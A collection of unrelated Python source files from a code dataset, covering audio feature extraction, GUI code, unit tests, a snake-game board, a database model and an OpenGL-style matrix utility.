os.path.join(sptk, 'mcep') + ' -a ' + str(alpha) + ' -m ' + str(
mcsize) + ' -l ' + str(
nFFTHalf) + ' -e 1.0E-8 -j 0 -f 0.0 -q 3 ', \
os.path.join(out_dir, file_id + '.mgc'))
os.system(sptk_x2x_df_cmd1)
### convert bapd to bap ###
sptk_x2x_df_cmd2 = "%s +df %s > %s " % (os.path.join(sptk, "x2x"), \
os.path.join(out_dir, file_id + ".bapd"), \
os.path.join(out_dir, file_id + '.bap'))
os.system(sptk_x2x_df_cmd2)
print("--- Feature extraction started ---")
start_time = time.time()
# get wav files list
wav_files = get_wav_filelist(wav_dir)
# do multi-processing
pool = mp.Pool(mp.cpu_count())
pool.map(process, wav_files)
# clean temporal files
#shutil.rmtree(out_dir, ignore_errors=True)
#shutil.rmtree(out_dir, ignore_errors=True)
#for zippath in glob.iglob(os.path.join(out_dir, '*.bapd')):
# os.remove(zippath)
clean_temp_files_cmd = "rm -rf %s/*.bapd %s/*.f0a %s/*.f0 %s/*.sp" % (out_dir, out_dir, out_dir, out_dir)
os.system(clean_temp_files_cmd)
print("You should have your features ready in: "+out_dir)
(m, s) = divmod(int(time.time() - start_time), 60)
print(("--- Feature extraction completion time: %d min. %d sec ---" % (m, s)))
| StarcoderdataPython |
3256213 | <filename>visualizer/main_ui.py<gh_stars>0
import eel
import json
import cv2
import base64
import numpy as np
from PIL import Image as PILlib
import io
import re
import sys, os
from threading import Thread
class Images:
@staticmethod
def read(im_path):
return cv2.imread(im_path)
@staticmethod
def unpack_im(pack, image_type):
if image_type == 'numpy':
b64, dtype, shape = pack
return np.frombuffer(base64.decodebytes(b64.encode()), dtype=dtype).reshape(shape)
elif image_type == 'jpeg' or image_type == 'jpg':
m = re.search(r'base64,(.*)', pack)
if m is None:
raise IndexError
imgstring = m.group(1)
# aplicamos una correccion para evitar un error de padding
imgbyte = imgstring.encode()
pad = len(pack.partition(",")[2]) % 4
imgbyte += b"="*pad
image = cv2.imdecode(np.frombuffer(io.BytesIO(base64.b64decode(imgbyte)).getbuffer(), np.uint8), -1)
return image[..., :3]
@staticmethod
def pack_im(im, image_type):
if image_type == 'numpy':
return base64.b64encode(np.ascontiguousarray(im)).decode(), im.dtype.name, im.shape
elif image_type == 'jpeg' or image_type == 'jpg':
return 'data:image/jpg; base64,' + base64.b64encode(cv2.imencode('.jpg', im)[1]).decode("utf-8")
class Visualizer():
def __init__(self, monitor, callback):
self.monitor = monitor
self.callback = callback
self.is_close = False
def close(self, *vargs):
self.is_close = True
def run(self):
eel.init(os.path.join(os.path.dirname(os.path.abspath(__file__))))
@eel.expose
def set_settings(data):
data = json.loads(data)
self.monitor.set_mode(int(data['mode']))
self.monitor.set_window(data['window'])
self.monitor.change_coords(int(data['left']),
int(data['top']),
int(data['width']),
int(data['height']))
@eel.expose
def get_settings():
params = {
'left': self.monitor.current_monitor['left'],
'top': self.monitor.current_monitor['top'],
'width': self.monitor.current_monitor['width'],
'height': self.monitor.current_monitor['height'],
'mode': self.monitor.mode,
'windows': self.monitor.get_windows(),
'current_window': self.monitor.current_window.get_wm_name() if self.monitor.current_window is not None else None
}
print(params)
return json.dumps(params)
def __run():
while not self.is_close:
frame, faces = self.callback()
frame = frame[..., ::-1].copy()
for face in faces:
x1, y1, x2, y2 = face.bb
if face.character is not None:
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 2, -1)
else:
cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 0, 255), 2, -1)
unique_bios = set()
for face in faces:
if face.character is not None:
unique_bios.add(face.character)
data = {
'image_detection': Images.pack_im(frame, 'jpg'),
'bios': [{'photo': Images.pack_im(character.thumbnail, 'jpg'), 'name': character.name, 'description': character.description} for character in unique_bios]
}
data_json = json.dumps(data)
eel.draw(data_json)
Thread(target=__run).start()
eel.start('main.html', mode='chrome', port=0, size=(520, 1280), close_callback=self.close)
| StarcoderdataPython |
1793830 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'page2.ui'
#
# Created by: PyQt5 UI code generator 5.15.5
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
import os
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.showMaximized()
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.nick = QtWidgets.QComboBox(self.centralwidget)
self.nick.setObjectName("nick")
self.nick.addItem("")
self.nick.addItem("")
self.nick.addItem("")
self.nick.addItem("")
self.gridLayout.addWidget(self.nick, 0, 0, 1, 1)
self.allow = QtWidgets.QRadioButton(self.centralwidget)
self.allow.setObjectName("allow")
self.gridLayout.addWidget(self.allow, 0, 3, 1, 1)
self.deny_2 = QtWidgets.QRadioButton(self.centralwidget)
self.deny_2.setObjectName("deny_2")
self.gridLayout.addWidget(self.deny_2, 1, 4, 1, 1)
self.profile_2 = QtWidgets.QComboBox(self.centralwidget)
self.profile_2.setObjectName("profile_2")
self.profile_2.addItem("")
self.profile_2.addItem("")
self.profile_2.addItem("")
self.profile_2.addItem("")
self.gridLayout.addWidget(self.profile_2, 1, 2, 1, 1)
self.profile_3 = QtWidgets.QComboBox(self.centralwidget)
self.profile_3.setObjectName("profile_3")
self.profile_3.addItem("")
self.profile_3.addItem("")
self.profile_3.addItem("")
self.profile_3.addItem("")
self.gridLayout.addWidget(self.profile_3, 2, 2, 1, 1)
self.deny_3 = QtWidgets.QRadioButton(self.centralwidget)
self.deny_3.setObjectName("deny_3")
self.gridLayout.addWidget(self.deny_3, 2, 4, 1, 1)
self.nick_2 = QtWidgets.QComboBox(self.centralwidget)
self.nick_2.setObjectName("nick_2")
self.nick_2.addItem("")
self.nick_2.addItem("")
self.nick_2.addItem("")
self.nick_2.addItem("")
self.gridLayout.addWidget(self.nick_2, 1, 0, 1, 1)
self.nick_3 = QtWidgets.QComboBox(self.centralwidget)
self.nick_3.setObjectName("nick_3")
self.nick_3.addItem("")
self.nick_3.addItem("")
self.nick_3.addItem("")
self.nick_3.addItem("")
self.gridLayout.addWidget(self.nick_3, 2, 0, 1, 1)
self.ip = QtWidgets.QComboBox(self.centralwidget)
self.ip.setObjectName("ip")
self.ip.addItem("")
self.ip.addItem("")
self.ip.addItem("")
self.ip.addItem("")
self.gridLayout.addWidget(self.ip, 0, 1, 1, 1)
self.deny = QtWidgets.QRadioButton(self.centralwidget)
self.deny.setObjectName("deny")
self.gridLayout.addWidget(self.deny, 0, 4, 1, 1)
self.ip_2 = QtWidgets.QComboBox(self.centralwidget)
self.ip_2.setObjectName("ip_2")
self.ip_2.addItem("")
self.ip_2.addItem("")
self.ip_2.addItem("")
self.ip_2.addItem("")
self.gridLayout.addWidget(self.ip_2, 1, 1, 1, 1)
self.ip_3 = QtWidgets.QComboBox(self.centralwidget)
self.ip_3.setObjectName("ip_3")
self.ip_3.addItem("")
self.ip_3.addItem("")
self.ip_3.addItem("")
self.ip_3.addItem("")
self.gridLayout.addWidget(self.ip_3, 2, 1, 1, 1)
self.allow_3 = QtWidgets.QRadioButton(self.centralwidget)
self.allow_3.setObjectName("allow_3")
self.gridLayout.addWidget(self.allow_3, 2, 3, 1, 1)
self.allow_2 = QtWidgets.QRadioButton(self.centralwidget)
self.allow_2.setObjectName("allow_2")
self.gridLayout.addWidget(self.allow_2, 1, 3, 1, 1)
self.profile = QtWidgets.QComboBox(self.centralwidget)
self.profile.setObjectName("profile")
self.profile.addItem("")
self.profile.addItem("")
self.profile.addItem("")
self.profile.addItem("")
self.gridLayout.addWidget(self.profile, 0, 2, 1, 1)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setMaximumSize(QtCore.QSize(548, 410))
self.label.setText("")
self.label.setPixmap(QtGui.QPixmap("/usr/share/hLOSGUI/Capture.png"))
self.label.setScaledContents(True)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 3, 3, 1, 2)
self.main = QtWidgets.QPushButton(self.centralwidget)
self.main.setStyleSheet("QPushButton {\n"
"color: #333;\n"
"background-color: rgb(0, 255, 0);\n"
"border: 2px solid #555;\n"
"border-radius: 20px;\n"
"border-style: outset;\n"
"padding: 5px;\n"
"}\n"
"\n"
"QPushButton:hover {\n"
"background: qradialgradient(\n"
"cx: 0.3, cy: -0.4, fx: 0.3, fy: -0.4,\n"
"radius: 1.35, stop: 0 #fff, stop: 1 #bbb\n"
");\n"
"}")
self.main.setObjectName("main")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(630, 400, 161, 141))
self.label.setText("")
#self.label.setPixmap(QtGui.QPixmap("Capture (1).png"))
self.label.setScaledContents(True)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.main, 3, 1, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1797, 39))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.main.clicked.connect(self.goback)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.nick.setItemText(0, _translate("MainWindow", "Nickname"))
self.nick.setItemText(1, _translate("MainWindow", "Nickname1"))
self.nick.setItemText(2, _translate("MainWindow", "Nickname2"))
self.nick.setItemText(3, _translate("MainWindow", "Nickname3"))
self.allow.setText(_translate("MainWindow", "Allow Override"))
self.deny_2.setText(_translate("MainWindow", "Deny Override"))
self.profile_2.setItemText(0, _translate("MainWindow", "Restriction Profile"))
self.profile_2.setItemText(1, _translate("MainWindow", "Restriction Profile 1"))
self.profile_2.setItemText(2, _translate("MainWindow", "Restriction Profile 2"))
self.profile_2.setItemText(3, _translate("MainWindow", "Restriction Profile 3"))
self.profile_3.setItemText(0, _translate("MainWindow", "Restriction Profile"))
self.profile_3.setItemText(1, _translate("MainWindow", "Restriction Profile 1"))
self.profile_3.setItemText(2, _translate("MainWindow", "Restriction Profile 2"))
self.profile_3.setItemText(3, _translate("MainWindow", "Restriction Profile 3"))
self.deny_3.setText(_translate("MainWindow", "Deny Override"))
self.nick_2.setItemText(0, _translate("MainWindow", "Nickname"))
self.nick_2.setItemText(1, _translate("MainWindow", "Nickname1"))
self.nick_2.setItemText(2, _translate("MainWindow", "Nickname2"))
self.nick_2.setItemText(3, _translate("MainWindow", "Nickname3"))
self.nick_3.setItemText(0, _translate("MainWindow", "Nickname"))
self.nick_3.setItemText(1, _translate("MainWindow", "Nickname1"))
self.nick_3.setItemText(2, _translate("MainWindow", "Nickname2"))
self.nick_3.setItemText(3, _translate("MainWindow", "Nickname3"))
self.ip.setItemText(0, _translate("MainWindow", "IP ADDRESS"))
self.ip.setItemText(1, _translate("MainWindow", "IP ADDRESS 1"))
self.ip.setItemText(2, _translate("MainWindow", "IP ADDRESS 2"))
self.ip.setItemText(3, _translate("MainWindow", "IP ADDRESS 3"))
self.deny.setText(_translate("MainWindow", "Deny Override"))
self.ip_2.setItemText(0, _translate("MainWindow", "IP ADDRESS"))
self.ip_2.setItemText(1, _translate("MainWindow", "IP ADDRESS 1"))
self.ip_2.setItemText(2, _translate("MainWindow", "IP ADDRESS 2"))
self.ip_2.setItemText(3, _translate("MainWindow", "IP ADDRESS 3"))
self.ip_3.setItemText(0, _translate("MainWindow", "IP ADDRESS"))
self.ip_3.setItemText(1, _translate("MainWindow", "IP ADDRESS 1"))
self.ip_3.setItemText(2, _translate("MainWindow", "IP ADDRESS 2"))
self.ip_3.setItemText(3, _translate("MainWindow", "IP ADDRESS 3"))
self.allow_3.setText(_translate("MainWindow", "Allow Override"))
self.allow_2.setText(_translate("MainWindow", "Allow Override"))
self.profile.setItemText(0, _translate("MainWindow", "Restriction Profile"))
self.profile.setItemText(1, _translate("MainWindow", "Restriction Profile 1"))
self.profile.setItemText(2, _translate("MainWindow", "Restriction Profile 2"))
self.profile.setItemText(3, _translate("MainWindow", "Restriction Profile 3"))
self.main.setText(_translate("MainWindow", "Main Menu"))
def goback(self):
MainWindow.close()
os.system("python3 /usr/share/hLOSGUI/page1.py")
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| StarcoderdataPython |
1656308 | from mock import MagicMock
from tests.unit import UnitTestBase
from express.properties.non_scalar.two_dimensional_plot.band_structure import BandStructure
from tests.fixtures.data import BAND_STRUCTURE, HSE_EIGENVALUES_AT_KPOINTS, HSE_BAND_STRUCTURE, EIGENVALUES_AT_KPOINTS
class BandStructureTest(UnitTestBase):
def setUp(self):
super(BandStructureTest, self).setUp()
def tearDown(self):
super(BandStructureTest, self).setUp()
def test_band_structure(self):
parser = MagicMock()
parser.attach_mock(MagicMock(return_value=1), "nspins")
parser.attach_mock(MagicMock(return_value=EIGENVALUES_AT_KPOINTS), "eigenvalues_at_kpoints")
property_ = BandStructure("band_structure", parser)
self.assertDeepAlmostEqual(property_.serialize_and_validate(), BAND_STRUCTURE)
def test_hse_band_structure(self):
parser = MagicMock()
parser.attach_mock(MagicMock(return_value=1), "nspins")
parser.attach_mock(MagicMock(return_value=HSE_EIGENVALUES_AT_KPOINTS), "eigenvalues_at_kpoints")
property_ = BandStructure("band_structure", parser, remove_non_zero_weight_kpoints=True)
self.assertDeepAlmostEqual(property_.serialize_and_validate(), HSE_BAND_STRUCTURE)
| StarcoderdataPython |
106746 | <reponame>cogment/cogment-verse
# Copyright 2021 AI Redefined Inc. <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from data_pb2 import Space
from cogment_verse.spaces import flattened_dimensions
def test_flattened_dimensions_discrete():
assert flattened_dimensions(Space(properties=[Space.Property(discrete=Space.Discrete(num=2))])) == 2
assert (
flattened_dimensions(
Space(
properties=[
Space.Property(
discrete=Space.Discrete(
labels=["brake", "accelerate", "do nothing"],
num=2, # Will be ignored as there are more labels
)
)
]
)
)
== 3
)
assert (
flattened_dimensions(
Space(
properties=[
Space.Property(discrete=Space.Discrete(labels=["brake", "accelerate", "do nothing"], num=12))
]
)
)
== 12
)
assert (
flattened_dimensions(
Space(
properties=[
Space.Property(key="a", discrete=Space.Discrete(labels=["brake", "accelerate", "do nothing"])),
Space.Property(key="b", discrete=Space.Discrete(num=5)),
]
)
)
== 8
)
def test_flattened_dimensions_box():
assert flattened_dimensions(Space(properties=[Space.Property(box=Space.Box(shape=[2]))])) == 2
assert flattened_dimensions(Space(properties=[Space.Property(box=Space.Box(shape=[4]))])) == 4
assert flattened_dimensions(Space(properties=[Space.Property(box=Space.Box(shape=[2, 3, 4]))])) == 24
assert (
flattened_dimensions(
Space(
properties=[
Space.Property(key="a", box=Space.Box(shape=[10])),
Space.Property(key="b", box=Space.Box(shape=[2, 3, 4])),
]
)
)
== 34
)
def test_flattened_dimensions_mixed():
assert (
flattened_dimensions(
Space(
properties=[
Space.Property(key="a", box=Space.Box(shape=[10])),
Space.Property(key="b", discrete=Space.Discrete(labels=["brake", "accelerate", "do nothing"])),
Space.Property(key="c", box=Space.Box(shape=[2, 3, 4])),
]
)
)
== 37
)
| StarcoderdataPython |
110039 | # This is a dummy file to allow the automatic loading of modules without error on none.
def setup(robot_config):
return
def say(*args):
return
def mute():
return
def unmute():
return
def volume(level):
return | StarcoderdataPython |
3353275 | <filename>tests/test_compile_acs.py
import os
from mazeexplorer.compile_acs import compile_acs
dir_path = os.path.dirname(os.path.realpath(__file__))
def test_compile_acs(tmpdir):
compile_acs(tmpdir.strpath)
assert os.path.isfile(os.path.join(tmpdir, "outputs", "maze.o"))
assert os.path.getsize(os.path.join(tmpdir, "outputs", "maze.o")) > 0
assert os.path.isdir(os.path.join(tmpdir, "outputs", "sources"))
assert os.path.isdir(os.path.join(tmpdir, "outputs", "images"))
| StarcoderdataPython |
3238450 | import random
import pygame
from basic_model.block import Block
from basic_model.occupant import Occupant
from simu_model.simuboard import SimuBoard
from simu_model.status import Status
class GuiBoard(SimuBoard):
def __init__(self, height, width):
super(GuiBoard, self).__init__(height,width)
self.blocks = [[Block(Occupant.Empty) for w in range(self.width)] for h in range(self.height)]
self.decided = False
self.desired_directions = []
self.desired_positions = []
self.food_spawn_locations = []
self.turn = 0
self.color_set = {
"Empty": (0, 0, 0),
"SnakeBody": (200, 200, 0),
"Food": (250, 20, 20),
"Border": (255, 255, 255)
}
self.width_in_pixel = 500
self.height_in_pixel = 500
self.window = pygame.display.set_mode((self.width_in_pixel, self.height_in_pixel)) # Creates our screen object
def draw_block(self, coord, color, eyes):
dis = self.width_in_pixel // self.width # Width/Height of each cube
x, y = coord # Current row
pygame.draw.rect(self.window, color, (x * dis + 1, y * dis + 1, dis - 2, dis - 2))
if eyes: # Draws the eyes
centre = dis // 2
radius = 3
circle_middle = (x * dis + centre - radius, y * dis + 8)
circle_middle2 = (x * dis + dis - radius * 2, y * dis + 8)
pygame.draw.circle(self.window, self.color_set["Empty"], circle_middle, radius)
pygame.draw.circle(self.window, self.color_set["Empty"], circle_middle2, radius)
def draw_grid(self):
w = self.height_in_pixel
size_btwn = w // self.height # Gives us the distance between the lines
x = 0 # Keeps track of the current x
y = 0 # Keeps track of the current y
for l in range(self.height): # We will draw one vertical and one horizontal line each loop
x = x + size_btwn
y = y + size_btwn
pygame.draw.line(self.window, self.color_set["Border"], (x, 0), (x, w))
pygame.draw.line(self.window, self.color_set["Border"], (0, y), (w, y))
def redraw_window(self):
# random.randint(0,255), random.randint(0,255), random.randint(0,255)
self.window.fill(self.color_set["Empty"]) # Fills the screen with black
#
for snake in self.snake_list:
if snake.status != Status.Alive:
continue
body_list = snake.body_list
snake_color = (random.randint(0,255), random.randint(0,255), random.randint(0,255))
self.draw_block(body_list[0],snake_color,True)
for body in body_list[1:]:
self.draw_block(body,snake_color,False)
#
for food in self.food_list:
self.draw_block(food,self.color_set["Food"],False)
self.draw_grid() # Will draw our grid lines
pygame.display.update() # Updates the screen
def message_box(self, subject, content):
pass
def render(self):
clock = pygame.time.Clock() # creating a clock object
flag = True
self.redraw_window()
| StarcoderdataPython |
1745854 | <gh_stars>0
'''
@author: daniel
'''
## mongoDB
mongoDB_IP = '127.0.0.1'
mongoDB_Port = 27017 # default local port. change this if you use SSH tunneling on your machine (likely 4321 or 27017).
mongoDB_db = 'pub'
## conferences we analysed
booktitles = ['ACL', 'JCDL','SIGIR','ECDL','TPDL','TREC', 'ICWSM', 'ESWC', 'ICSR','WWW', 'ICSE', 'HRI', 'VLDB', 'ICRA', 'ICARCV']
facets = ['dataset', 'method']
use_in_viewer = ['ACL', 'VLDB', 'WWW', 'ICWSM']
min_ne_threshold = 16
nr_top_papers = 6
nr_top_papers_cited = 50
seedsize = 50
iteration = 0
# Root paths
ROOTPATH='<ROOTPATH PROJECT FOLDER>'
PDFNLT_PATH = '<RELATIVE PATH TO PDFNLT FOLDER>'
scholar_query_limit = 65
| StarcoderdataPython |
66150 | <gh_stars>0
from aiflearn.explainers.explainer import Explainer
from aiflearn.explainers.metric_text_explainer import MetricTextExplainer
from aiflearn.explainers.metric_json_explainer import MetricJSONExplainer
| StarcoderdataPython |
3205834 | <reponame>nojoven/CommentsGate
from datetime import datetime
from sqlalchemy import Column, String
from sqlalchemy.orm import relationship
from utils.helpers import generate_uuid
from database import Base
class Comment(Base):
__tablename__ = "comments"
id = Column(
String, unique=True, primary_key=True, index=True, default=generate_uuid
)
textFr = Column(String, index=True)
textEn = Column(String, index=True)
publishedAt = Column(
String, nullable=False, default=str(datetime.now().timestamp()), index=True
)
authorId = Column(String, index=True)
targetId = Column(
String,
index=True,
)
replies = relationship(
"Comment",
uselist=True,
foreign_keys=[targetId],
primaryjoin="Comment.id == Comment.targetId",
lazy="subquery",
)
| StarcoderdataPython |
9009 | import pandas as pd
from tqdm import tqdm
data_list = []
def get_questions(row):
global data_list
random_samples = df.sample(n=num_choices - 1)
distractors = random_samples["description"].tolist()
data = {
"question": "What is " + row["label"] + "?",
"correct": row["description"],
"distractors": distractors,
"knowledge": "{" + row["label"] + " : " + row["description"] + "}",
}
data_list.append(data)
debug = False
num_choices = 4
tqdm.pandas(desc="Progress")
df = pd.read_pickle("data/augmented_datasets/pickle/label_description.pkl")
if debug:
df = df.iloc[:10]
df = df.progress_apply(get_questions, axis=1)
new_df = pd.DataFrame(data_list)
if not debug:
new_df.to_pickle("data/augmented_datasets/pickle/description_qa_knowledge.pkl")
else:
__import__("pudb").set_trace()
| StarcoderdataPython |
4811432 | from application import db
class TimestampMixin(object):
created = db.Column(db.TIMESTAMP,
default=db.func.utc_timestamp())
modified = db.Column(db.TIMESTAMP,
default=db.func.utc_timestamp(),
onupdate=db.func.utc_timestamp()) | StarcoderdataPython |
3382595 | #!/usr/bin/env python3
"""
Duplicate OpenGL coordinate system...
See:
https://gamedev.stackexchange.com/questions/153078/what-can-i-do-with-the-4th-component-of-gl-position
"""
import sys
from math import sin, cos, pi, sqrt
import numpy
scalar = numpy.float64
EPSILON = 1e-6
class Mat(object):
def __init__(self, cs):
A = numpy.array(cs, dtype=scalar)
if len(A.shape)==1:
m = len(A)
A.shape = (m, 1) # col vector
assert len(A.shape)==2, A.shape
self.A = A
self.shape = A.shape
def strvec(self):
v = self.A[:, 0]
s = str(list(v))
return "Mat(%s)"%(s,)
def __str__(self):
if self.shape[1] == 1:
return self.strvec()
A = self.A
rows = [', '.join(["%.6f"%x for x in row]) for row in A]
rows = ["[%s]"%row for row in rows]
rows = "[%s]"%("\n".join(rows),)
rows = rows.replace(".000000", ". ")
return rows
__repr__ = __str__
def __eq__(self, other):
other = Mat.promote(other)
assert self.shape == other.shape
err = numpy.abs(self.A - other.A).sum()
return err < EPSILON
def __ne__(self, other):
return not self.__eq__(other)
def copy(self):
A = self.A.copy()
return Mat(A)
@classmethod
def promote(cls, item):
if isinstance(item, Mat):
return item
m = Mat(item)
return m
@classmethod
def identity(cls, n):
A = numpy.identity(n)
return cls(A)
def __add__(self, other):
other = Mat.promote(other)
assert self.shape == other.shape
A = self.A + other.A
return Mat(A)
def __sub__(self, other):
other = Mat.promote(other)
assert self.shape == other.shape
A = self.A - other.A
return Mat(A)
def __neg__(self):
A = -self.A
return Mat(A)
def __mul__(self, other):
other = Mat.promote(other)
assert self.shape[1] == other.shape[0]
A = numpy.dot(self.A, other.A)
return Mat(A)
def __rmul__(self, r):
A = r*self.A
return Mat(A)
def __getitem__(self, idx):
if type(idx) is tuple:
return self.A[idx] # <------ return
elif type(idx) is slice:
A = self.A[idx]
return Mat(A) # <----- return
if self.shape[1] == 1:
idx = (idx, 0)
return self.A[idx]
def __setitem__(self, idx, value):
if type(idx) is tuple:
pass
elif self.shape[1] == 1:
idx = (idx, 0)
self.A[idx] = value
@classmethod
def frustum(cls, left, right, bottom, top, nearval, farval):
# mesa/src/mesa/math/m_matrix.c
"""
GLfloat x, y, a, b, c, d;
GLfloat m[16];
x = (2.0F*nearval) / (right-left);
y = (2.0F*nearval) / (top-bottom);
a = (right+left) / (right-left);
b = (top+bottom) / (top-bottom);
c = -(farval+nearval) / ( farval-nearval);
d = -(2.0F*farval*nearval) / (farval-nearval); /* error? */
#define M(row,col) m[col*4+row]
M(0,0) = x; M(0,1) = 0.0F; M(0,2) = a; M(0,3) = 0.0F;
M(1,0) = 0.0F; M(1,1) = y; M(1,2) = b; M(1,3) = 0.0F;
M(2,0) = 0.0F; M(2,1) = 0.0F; M(2,2) = c; M(2,3) = d;
M(3,0) = 0.0F; M(3,1) = 0.0F; M(3,2) = -1.0F; M(3,3) = 0.0F;
#undef M
matrix_multf( mat, m, MAT_FLAG_PERSPECTIVE );
"""
pass # TODO
@classmethod
def rotate(cls, angle, x, y, z):
# angle in degrees
s = sin(angle * pi / 180.0)
c = cos(angle * pi / 180.0)
M = cls.identity(4)
r = sqrt(x*x + y*y + z*z)
if r < EPSILON:
return
x /= r
y /= r
z /= r
xx = x * x
yy = y * y
zz = z * z
xy = x * y
yz = y * z
zx = z * x
xs = x * s
ys = y * s
zs = z * s
one_c = 1.0 - c
M[0,0] = (one_c * xx) + c
M[0,1] = (one_c * xy) - zs
M[0,2] = (one_c * zx) + ys
M[0,3] = 0.0
M[1,0] = (one_c * xy) + zs
M[1,1] = (one_c * yy) + c
M[1,2] = (one_c * yz) - xs
M[1,3] = 0.0
M[2,0] = (one_c * zx) - ys
M[2,1] = (one_c * yz) + xs
M[2,2] = (one_c * zz) + c
M[2,3] = 0.0
M[3,0] = 0.0
M[3,1] = 0.0
M[3,2] = 0.0
M[3,3] = 1.0
return M
@classmethod
def translate(cls, *args):
"modelled after glTranslate"
n = len(args)+1
A = numpy.identity(n)
for i,val in enumerate(args):
A[i, n-1] = val
M = cls(A)
return M
@classmethod
def scale(cls, sx, sy, sz):
"modelled after glScale"
A = numpy.identity(4)
A[0, 0] = sx
A[1, 1] = sy
A[2, 2] = sz
M = cls(A)
return M
@classmethod
def perspective(cls, fovy, aspect, z_near, z_far):
"modelled after gluPerspective"
theta = fovy / 2 * pi / 180
delta_z = z_far - z_near
sine = sin(theta)
if (delta_z == 0) or (sine == 0) or (aspect == 0):
return
cotangent = cos(theta) / sine
A = numpy.identity(4)
A[0,0] = cotangent / aspect
A[1,1] = cotangent
A[2,2] = -(z_far + z_near) / delta_z
#A[2,3] = -1
A[3,2] = -1
#A[3,2] = -2 * z_near * z_far / delta_z
A[2,3] = -2 * z_near * z_far / delta_z
A[3,3] = 0
M = Mat(A)
return M
def norm(self):
A = self.A
r = (A*A).sum()**0.5
return r
def normalized(self):
r = self.norm()
assert r>EPSILON
A = self.A / r
return Mat(A)
def cross(self, other):
assert self.shape == (3, 1)
assert other.shape == (3, 1)
cs = [
self[1]*other[2] - self[2]*other[1],
self[2]*other[0] - self[0]*other[2],
self[0]*other[1] - self[1]*other[0]]
return Mat(cs)
def dot(self, other):
assert self.shape == (3, 1)
assert other.shape == (3, 1)
r = (self.A*other.A).sum()
return r
@classmethod
def lookat(cls, eye, center, up):
"modelled after gluLookAt"
eye = cls.promote(eye)
center = cls.promote(center)
up = cls.promote(up)
forward = center - eye
forward = forward.normalized()
side = forward.cross(up)
side = side.normalized()
up = side.cross(forward)
#M = cls.identity(4)
M = numpy.identity(4)
M[0,0] = side[0]
M[1,0] = side[1]
M[2,0] = side[2]
M[0,1] = up[0]
M[1,1] = up[1]
M[2,1] = up[2]
M[0,2] = -forward[0]
M[1,2] = -forward[1]
M[2,2] = -forward[2]
M = M.transpose()
M = Mat(M)
M1 = cls.translate(-eye[0], -eye[1], -eye[2])
M = M*M1
return M
# ----------------------------------------------------------------------
def test_perspective():
width, height = 640, 480
proj = Mat.identity(4)
M = Mat.perspective(45., width/height, 0.1, 100.)
proj = M * proj
assert proj == Mat([
[ 1.8106601, 0., 0., 0., ],
[ 0., 2.4142137, 0., 0., ],
[ 0., 0., -1.002002, -0.2002002, ],
[ 0., 0., -1., 0., ]])
test_perspective()
# ----------------------------------------------------------------------
from bruhat.render.base import SCALE_CM_TO_POINT
from bruhat.render.front import *
def mkpath(pts, closepath=True):
pts = [path.moveto(*pts[0])]+[path.lineto(*p) for p in pts[1:]]
if closepath:
pts.append(path.closepath())
p = path.path(*pts)
return p
class GItem(object):
def __init__(self, verts, epsilon=1e-4):
assert len(verts) >= 3
v0 = verts[0]
for v in verts[1:]:
v0 = v0 + v
center = (1./len(verts))*v0
if epsilon is not None and len(verts)>1:
# try to cover up the seams.
# does not look good with alpha blending
verts = [p + epsilon*(p-center).normalized() for p in verts]
self.verts = verts
self.center = center
def render(self, cvs):
pass
class GPoly(GItem):
def __init__(self, verts, fill=None, stroke=None, epsilon=1e-2):
GItem.__init__(self, verts, epsilon)
self.fill = fill
self.stroke = stroke
v0, v1, v2 = verts[:3]
a = v1-v0
b = v2-v0
ab = a.cross(b)
assert ab.norm() > EPSILON
self.normal = ab.normalized()
def render(self, view, cvs):
GItem.render(self, cvs)
#fill, stroke = view.illuminate(self)
fill = self.fill
stroke = self.stroke
verts = [view.trafo_canvas(v) for v in self.verts]
v = self.center
n = self.normal
if fill is not None:
fill = view.illuminate(v, n, fill)
if stroke is not None:
stroke = view.illuminate(v, n, stroke)
cvs.append(Polygon(verts, fill, stroke))
class GMesh(GItem):
def __init__(self, verts, normals, fill, epsilon=1e-2):
GItem.__init__(self, verts, epsilon)
assert len(verts) >= 3
assert len(verts) == len(normals)
v0, v1, v2 = verts[:3]
a = v1-v0
b = v2-v0
ab = a.cross(b)
normal = ab.normalized()
self.normals = normals
for n in normals:
assert normal.dot(n) > 0.
self.fill = fill
def render(self, view, cvs):
GItem.render(self, cvs)
verts = [view.trafo_canvas(v) for v in self.verts]
fill = self.fill
fills = [view.illuminate(v, n, fill)
for (v,n) in zip(self.verts, self.normals)]
cvs.append(Polymesh(verts, fills))
#class GBall(GItem):
# def __init__(self, point, radius):
# GItem.__init__(self, [point])
# self.radius = radius
#
